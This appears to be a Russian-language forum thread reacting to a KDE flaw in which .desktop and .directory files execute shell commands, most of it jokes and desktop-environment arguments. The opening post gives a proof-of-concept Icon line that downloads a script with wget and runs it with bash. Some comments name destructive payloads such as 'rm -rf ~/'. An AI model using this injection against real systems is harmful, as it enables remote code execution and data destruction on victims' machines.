Незакрытая уязвимость в KDE

Речь о файлах .desktop и .directory. Пример:

[Desktop Entry]
Type=Directory
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

*Ушёл удалять кеды*

Кде ставят в основном виндузятники, которые любят чтобы линух был похож на винду

Феерично. «О сколько нам бэкдоров чудных готовит Интернета век!»

а в винде тоже была уязвимость, когда иконки исполнялись. BUG-TO-BUG compatibility!

Удалил кеды. Спасибо.

Уииии летс кедосрач бегин!

Жесть. Давно такого позора не было.

А будет ли? Вполне возможно, что слоган «нас мало, но мы в кедах» пора менять на «нас очень мало, и мы скоро не в кедах».

Чем жирнее софт, тем больше вероятность ошибки, очевидно. Не сто́ит жертвовать безопасностью ради удобства.

Когда там последнюю уязвимость в GNOME нашли? В 10 году?

«Сам дурак.» ©®

Когда я говорил, что Dolphin, вечно засирающий каталоги файлом .directory, когда-нибудь этим поплатится, все смеялись и не верили.

Вообще эту дрянь с .directory-файлами нужно переписать и сделать по уму, как в Nautilus, где имеется нормальная база данных для параметров директорий. Странно, что KDE-шники до сих пор это не сделали и идут путём Windows (засрём всё Thumbs.db) или macOS (ну здравствуй, .DS_Store).

Да не, в конце прошлого года: https://www.opennet.ru/opennews/art.shtml?num=49871

А 2 года назад было кое-что похожее: http://www1.opennet.ru/opennews/art.shtml?num=46885

Справедливости ради, надо сказать, что вантуз можно отучить плодить тумбочки. Про макОСь не помню, вроде тоже на то твикеры были.

Вообще, надо пользоваться нормальными ФМ, вроде mc или PCManFM, которые не плодят всякую хрень, которая потом мешает юзеру, заставляя его лихорадочно вспоминать, какие настройки у той или иной директории.

Первая уязвимость, конечно, сурьезная. А вот вторая - хрень де-факто. Но самое забавное, что исходя из второй новости можно найти третью уязвимость! https://www.opennet.ru/opennews/art.shtml?num=46854

Pешето, блджад.

Пользуюсь Dolphin, directory-файлов нигде нет, а этими убогими огрызками сам пользуйся

«нас мало, но мы обуты в снегоступы»

Виндовые баги середины 2000-х теперь и в линупсе.

где имеется нормальная база данных для параметров директорий

при подключении к другому пк настройки для каталога не будут видны.

Ждем CIH для Linux.

Пользуюсь krusader, directory-файлов нет.

Да? Иконку на каталог поставь... Там тоже это работает. И теоретически можно тебе флешку дать с «rm -rf ~/*»

Зачем искать уязвимость в том, чем никто не пользуется ;)

Ожидаемый коммент. GNOME - стандарт. Только это не отменяет того факта что он решето.

Вспомнил баян про белорусский вирус и пошел паниковать.

Разве, это вроде гном стремится быть максимально простым. Кеды можно настроить как угодно.

*Ушёл удалять кеды*

Я надеюсь пошел прямо с гитхаба удалять?

Dolphin, это дельфин или такой FM? Лежит на полочке в меню и никого не трогает.

Кде ставят в основном виндузятники, которые любят чтобы линух был похож на винду

Как будто что-то плохое

Мне больше всего это понравилось https://www.youtube.com/watch?v=WKwRijjqdzY

Вообще по поводу thumbnail и прочего – тема богатая

Еще одна винда не нужна. Уже есть единственная-неповторимая - наслаждайся.

Пользуюсь Dolphin, directory-файлов нигде нет, а этими убогими огрызками сам пользуйся

Есть же божественный krusader

Еще одна винда не нужна. Уже есть единственная-неповторимая - наслаждайся.

Единственная-неповторимая осталась в 2000 году. Всё остальное приходится допиливать напильником, чтобы хоть немного походило на Win2K. Дисяточку, кстати, уже невозможно так допилить, увы.

Там тоже самое, это баг в КДЕ

Эх. Жаль.

Кде ставят в основном виндузятники, которые любят чтобы линух был похож на винду

До определённого момента Гном был был предпочтительнее экспиподобного КДЕ. Потом всё превратилось в Яблоко. Причём обгрызанное со всех сторон. Не надо валить на потребляющих Винду свои косяки :)

А если пользователь не под рутом?

Оу щит. Это реально вот так вот работает? EPIC FAIL

при подключении к другому пк настройки для каталога не будут видны.

1. Как будто этим дерьмом вообще кто-то пользуется, оно обычно только в ступор вводит.
2. Иконки всё равно слетят, если они лежат «где-то там» на локальном компе.

То можно покоцать хомяк. С точки зрения системы - ерунда, а с точки зрения юзера - лучше бы система пропала, а хомяк остался :)

А если пользователь не под рутом?

И как это спасёт тебя, если я засуну туда rm -Rf ~/ ?

Нет, не так давно, кстати.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14604

То можно покоцать хомяк

Более того, если у жертвы какое-нибудь старое ядро, для которого есть готовый эксплоит, можно легко запустить его и получить root.

Да не нужен рут на десктопе. Удалить домашний каталог и запустить майнер можно под обычным пользователем.

а другие DE, использующие эти .desktop файлы, таким не грешат?

по уму, как в Nautilus, где имеется нормальная база данных для параметров директорий

Говно тормозное, только ресурсы жрёт напрасно.

теперь готово для десктопа

пойду напишу KDE .desktop Remover Enterprise (с поддержкой интеграции Oracle Database)

Давай иди, заодно и сам удались